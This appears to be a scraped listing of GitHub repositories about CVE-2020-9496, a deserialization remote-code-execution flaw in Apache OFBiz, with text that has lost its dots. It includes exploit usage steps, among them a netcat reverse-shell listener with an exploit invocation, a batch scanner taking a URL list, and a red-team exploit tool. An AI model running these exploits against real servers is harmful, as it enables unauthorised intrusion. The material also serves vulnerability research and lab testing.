CVE-2020-9496

XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03

CVE-2020-9496 XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 171203 Install requirements $ pip install -r requirementstxt $ wget jitpackio/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOTjar -O ysoserialjar Usage $ python cve-2020-9496py --targ

GUI Exploit Tool For RedTeam

0x00 Introduction 一款GUI漏洞利用工具，主要辅助红队进行复杂的攻击场景的利用，如部分非http协议和异步漏洞利用。目前该版本开发较为仓促，后续会频繁迭代。 目前支持的漏洞有： Fastjson漏洞回显 Jmxrmi漏洞回显 RmiServer漏洞回显 ApacheOfbiz漏洞利用回显(CVE-2021-26295,CVE-2020-9496)

CVE-2020-9496 Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization This issue was reported to the security team by Alvaro Munoz pwntester@githubcom from the GitHub Security Lab team Affected Version 171201 Fixed Versions 181201, 171204 Original Blog: securitylabgithubcom/

CVE-2020-9496 manual exploit

CVE-2020-9496 - RCE Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization This issue was reported to the security team by Alvaro Munoz pwntester@githubcom from the GitHub Security Lab team This vulnerability exists due to Java serialization issues when processing requests sent to /webtool

Apache OFBiz unsafe deserialization of XMLRPC arguments

CVE-2020-9496 - RCE Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization This issue was reported to the security team by Alvaro Munoz pwntester@githubcom from the GitHub Security Lab team This vulnerability exists due to Java serialization issues when processing requests sent to /webtool

apache-ofbiz-CVE-2020-9496 Youtube wwwyoutubecom/watch?v=DO93Xc8sGWg

HackTheBox-Monitors Writeup RFI-SQLi-Deserialization-DockerEscape Synopsis “Monitors” is marked as hard difficulty linux machine that features Apache service hosting Wordpress website The HTML source reveals a Wordpress plugin that is vulnerable to RFI (Remote File Inclusion) Using this vulnerability we read configuration file of Wordpress and apache, the former

CVE-2020-9496 Set-up Vulnerable Environment ▶ wget archiveapacheorg/dist/ofbiz/apache-ofbiz-171201zip ▶ unzip apache-ofbiz-171201zip ▶ cd apache-ofbiz-171201 ▶ sh gradle/init-gradle-wrappersh ▶ /gradlew cleanAll loadDefault ▶ /gradlew "ofbiz --load-data readers=seed,seed-initial,ext" ▶ /gradlew ofbiz # Start OFBiz

CVE-2020-9496和CVE-2021-26295利用dnslog批量验证漏洞poc及exp

ofbiz-poc CVE-2020-9496和CVE_2020_9496利用dnslog批量验证漏洞poc及exp OFBiz_CVE_2020_9496py 及 OFBiz_CVE_2021_26295py 为单个漏洞验证 ofbiz_pocpy 为批量验证两个漏洞，将需要批量验证的网站保存至urlstxt 漏洞复现请查看：yuaneurocn/archives/ofbizhtml

ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión

CVE-2020-9496 ApacheOfBiz 171201 - Unauthorized Remote Code Executión XML-RPC request are vulnerable to unsafe deserialization Steps Step 1: pip3 install -r requerimentstxt Step 2: nc -nlvp <port> # attack computer Step 3: python3 shellpy -i <remote IP> -p <remote port> -li <local IP> -lp <local port&

Articles accumulated by the 360Quake team.

Papers Articles accumulated by the 360Quake team quake360cn/quake/#/report Title Date 浅析 CobaltStrike钓鱼网站检测 2021-06-11 浅析 Cobalt Strike Team Server扫描 2021-04-15 浅析开源蜜罐识别 2020-12-18 SolarWinds失陷服务器测绘分析报告 2020-12-16 TLS server-side tagging 2020-12-14 利用JARM指纹进行TLS服务端标记